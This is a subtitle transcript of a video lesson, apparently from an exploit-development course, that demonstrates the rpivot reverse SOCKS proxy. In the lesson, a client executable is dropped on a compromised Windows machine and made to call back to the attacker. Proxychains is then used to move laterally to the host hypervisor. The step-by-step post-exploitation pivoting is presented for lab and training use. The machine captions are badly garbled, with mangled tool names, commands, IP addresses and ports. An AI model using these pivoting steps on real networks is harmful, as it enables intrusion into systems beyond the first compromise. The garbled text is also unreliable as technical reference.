1
00:00:00,390 --> 00:00:03,180
Welcome back to Basic Exploit Development.

2
00:00:03,420 --> 00:00:06,990
And today, I'm going to show you a fun tool called our Pivot.

3
00:00:08,630 --> 00:00:14,720
So what is our pivot archive as a repository on GitHub that allows the creation of dynamic SoCs for

4
00:00:14,720 --> 00:00:17,270
proxies that functions in reverse.

5
00:00:17,660 --> 00:00:20,900
Normally against a conquest like system that you literally credentials for.

6
00:00:21,200 --> 00:00:26,090
You can create a local proxy port to attack additional machines in the victim's subnet in routing tables

7
00:00:26,090 --> 00:00:32,780
by using the command association nfd or dynamic port forwarding 1080 route at midterm.

8
00:00:33,170 --> 00:00:39,710
However, when those machines versions 8.1 and above come with an optional feature to install it, open

9
00:00:39,710 --> 00:00:41,960
a siege server, not install by default.

10
00:00:42,470 --> 00:00:51,830
And if we have a Windows XP 2000 Vista or seven machine, how can you create a reverse proxy without

11
00:00:51,920 --> 00:00:52,940
having open SDK?

12
00:00:52,940 --> 00:01:00,050
Install our pivot as a Python module that turns the victim's machine into a reverse dynamic soc's proxy

13
00:01:00,050 --> 00:01:04,970
by having a ARC server listed on the attacker and featuring a draft for our pivot.

14
00:01:05,120 --> 00:01:09,170
That excu file client aren't actually that could be installed on the victim.

15
00:01:09,590 --> 00:01:14,840
Our pivot or client actually dates next back to the specified attacker's IP address and listener server

16
00:01:14,840 --> 00:01:15,200
port.

17
00:01:15,530 --> 00:01:21,560
On the attacker side, it buys a new port of your specification to use proxy chains to allow the attacker

18
00:01:21,560 --> 00:01:24,290
to scan through this proxy through the initial victim's network.

19
00:01:26,960 --> 00:01:32,540
In this exercise, we will be using one compromised Windows machine as a proxy to attack additional

20
00:01:32,540 --> 00:01:33,830
machines within the network.

21
00:01:34,220 --> 00:01:38,720
One, we're going to compromise the initial target and gain access to.

22
00:01:38,840 --> 00:01:41,000
We're going to drop client execute on the victim.

23
00:01:41,300 --> 00:01:48,380
Three Run a run client out and the victim's command line for use a newly bound local porchester through

24
00:01:48,380 --> 00:01:50,930
the initial victim to attack additional machines.

25
00:01:51,980 --> 00:01:54,470
So let's go into our penetration testing boxes.

26
00:01:57,960 --> 00:01:59,070
Here's my directory.

27
00:01:59,580 --> 00:02:06,330
We're going to drop, cleaned out, execute on the dome, and we're going to show you how to start the

28
00:02:06,330 --> 00:02:06,810
server.

29
00:02:07,560 --> 00:02:09,479
This just a simple script I made for reference.

30
00:02:10,080 --> 00:02:13,530
So it's python server, not pie server.

31
00:02:13,530 --> 00:02:15,150
Port 999.

32
00:02:15,570 --> 00:02:16,170
Server.

33
00:02:16,380 --> 00:02:16,920
IP.

34
00:02:17,820 --> 00:02:18,510
Myself.

35
00:02:19,320 --> 00:02:19,950
Proxy.

36
00:02:21,480 --> 00:02:22,080
Proxy.

37
00:02:22,140 --> 00:02:22,740
IP.

38
00:02:23,370 --> 00:02:24,030
Local host.

39
00:02:24,930 --> 00:02:25,620
Proxy.

40
00:02:25,710 --> 00:02:27,090
Port 1080.

41
00:02:32,600 --> 00:02:36,680
Now we're going to our desktop into one of our hack machines that we did before.

42
00:02:45,290 --> 00:02:52,690
Several solutions, a 600 by 900 an IP address was 125, I believe.

43
00:02:58,220 --> 00:03:05,300
It's important that we create a HTP server to serve the file to the victim.

44
00:03:05,780 --> 00:03:12,380
So we're going to Python Dash and simple HDP server 80.

45
00:03:16,740 --> 00:03:17,790
And then our victim.

46
00:03:19,700 --> 00:03:21,650
We're going to navigate to our directory.

47
00:03:26,910 --> 00:03:28,740
And then we're going to download client data execute.

48
00:03:33,360 --> 00:03:35,700
So let's look at the documentation again.

49
00:03:43,590 --> 00:03:49,500
On the victim we need to run client that execute sobriety might have the IP address and server report

50
00:03:49,500 --> 00:03:50,820
19999.

51
00:03:52,810 --> 00:03:55,060
So windows are for command line.

52
00:04:04,230 --> 00:04:05,310
Let's see if we can find it.

53
00:04:05,370 --> 00:04:06,120
Yes, we do.

54
00:04:08,450 --> 00:04:11,030
I really wish I could maximize the tax on this, guys.

55
00:04:11,420 --> 00:04:11,990
I'm sorry.

56
00:04:12,710 --> 00:04:13,100
I thought.

57
00:04:13,100 --> 00:04:13,670
Excuse.

58
00:04:18,880 --> 00:04:22,390
Server IP 1921681 2110.

59
00:04:23,200 --> 00:04:25,750
Server 49999.

60
00:04:34,350 --> 00:04:36,450
We now have a new connection from our victim.

61
00:04:37,470 --> 00:04:43,110
And now we're to play around with proxy chains to show you different ways of how I can do it.

62
00:04:44,460 --> 00:04:45,960
Make sure you change that, too.

63
00:04:46,920 --> 00:04:49,200
This sucks for local host 1080.

64
00:04:51,090 --> 00:04:59,790
They don't want to do pricey chains fast and that 422 no pain.

65
00:05:01,830 --> 00:05:04,470
12168 122 one.

66
00:05:08,790 --> 00:05:15,480
We noticed that our host hypervisor has a portal open for proxy chains.

67
00:05:16,410 --> 00:05:17,280
S6 Edge.

68
00:05:20,660 --> 00:05:22,850
192168 122 one.

69
00:05:27,280 --> 00:05:31,600
Look here, this is coming from the windowsills and it's going into the guest.

70
00:05:35,900 --> 00:05:43,730
And now we formed a lateral movement between the initial Windows Hack machine to the host hypervisor.

71
00:05:47,790 --> 00:05:50,580
So let's try it again and see if it takes up the IP address.

72
00:05:53,380 --> 00:06:03,070
See it travels from our Windows had Windows XP machine, which is this IP address and we compromised

73
00:06:03,070 --> 00:06:05,740
the host hypervisor using proxy chains and our pivot.

74
00:06:06,280 --> 00:06:11,860
This is very, very useful in the event that you're exploiting windows machines that do not have open

75
00:06:11,860 --> 00:06:17,770
isolation stock, allowing you to pivot to other windows machines on the network or to look for other

76
00:06:17,770 --> 00:06:18,730
targets to attack.